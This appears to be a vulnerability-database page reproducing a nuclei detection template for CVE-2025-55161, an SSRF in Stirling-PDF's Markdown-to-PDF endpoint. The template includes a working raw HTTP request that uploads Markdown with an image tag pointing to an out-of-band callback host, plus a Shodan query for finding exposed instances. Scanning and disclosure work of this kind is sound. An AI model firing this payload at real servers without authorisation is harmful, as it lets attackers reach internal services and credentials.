Lucene search
K

Stirling-PDF SSRF via Markdown

🗓️ 04 Jul 2026 03:00:48Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 24 Views

Stirling-PDF Markdown to PDF endpoint SSRF via sanitizer bypass; fixed in version 1.1.0.

Related
Refs
Code
ReporterTitlePublishedViews
Family
Circl
CVE-2025-55161
12 Aug 202500:38
circl
CNNVD
Stirling-PDF 代码问题漏洞
11 Aug 202500:00
cnnvd
CVE
CVE-2025-55161
11 Aug 202522:28
cve
Cvelist
CVE-2025-55161 Stirling-PDF SSRF vulnerability on /api/v1/convert/markdown/pdf
11 Aug 202522:28
cvelist
EUVD
EUVD-2025-24184
3 Oct 202520:07
euvd
NVD
CVE-2025-55161
11 Aug 202523:15
nvd
OSV
CVE-2025-55161 Stirling-PDF SSRF vulnerability on /api/v1/convert/markdown/pdf
11 Aug 202522:28
osv
Positive Technologies
PT-2025-32596
11 Aug 202500:00
ptsecurity
RedhatCVE
CVE-2025-55161
13 Aug 202522:28
redhatcve
VulnCheck KEV
VulnCheck KEV: CVE-2025-55161
7 Oct 202500:00
vulncheck_kev
Rows per page
id: CVE-2025-55161

info:
  name: Stirling-PDF SSRF via Markdown
  author: beginee
  severity: high
  description: |
    Stirling-PDF is a locally hosted web application that performs various operations on PDF files. Prior to version 1.1.0, when using the /api/v1/convert/markdown/pdf endpoint to convert Markdown to PDF, the backend calls a third-party tool to process it and includes a sanitizer for security sanitization which can be bypassed and result in SSRF.
  impact: |
    Unauthenticated attackers can force the server to make requests to arbitrary URLs through malicious Markdown image tags, potentially exposing internal services and credentials.
  remediation: This issue has been patched in version 1.1.0.
  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2025-55161
    - https://github.com/Stirling-Tools/Stirling-PDF
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:L
    cvss-score: 8.6
    cve-id: CVE-2025-55161
    cwe-id: CWE-918
    epss-score: 0.01865
    epss-percentile: 0.76728
  metadata:
    verified: true
    max-request: 1
    shodan-query: http.title:"Stirling PDF"
  tags: cve,cve2025,ssrf,stirling-pdf,pdf,markdown,oast,oob,vkev,vuln

variables:
  filename: "{{to_lower(rand_text_alpha(5))}}"

http:
  - raw:
      - |
        POST /api/v1/convert/markdown/pdf HTTP/1.1
        Host: {{Hostname}}
        Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryvAfAbBmFpYrQfooK

        ------WebKitFormBoundaryvAfAbBmFpYrQfooK
        Content-Disposition: form-data; name="fileInput"; filename="{{filename}}.md"
        Content-Type: application/octet-stream

        <img src='http://{{interactsh-url}}/' />
        ------WebKitFormBoundaryvAfAbBmFpYrQfooK--

    matchers:
      - type: dsl
        dsl:
          - contains(interactsh_protocol, 'dns')
          - contains(content_type, "application/pdf")
          - status_code == 200
        condition: and
# digest: 4b0a00483046022100be3709fd1dad20bfc25ab8aa4131d0334a75787e5b3f198a37a40add6be568f20221008aa49090e66ef3e8d2ce909041ac00c1c606f445757b0283d77b3af21c8a4fd7:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
6Medium risk
Vulners AI Score6
CVSS 3.18.6 - 9.8
EPSS0.01865
SSVC
24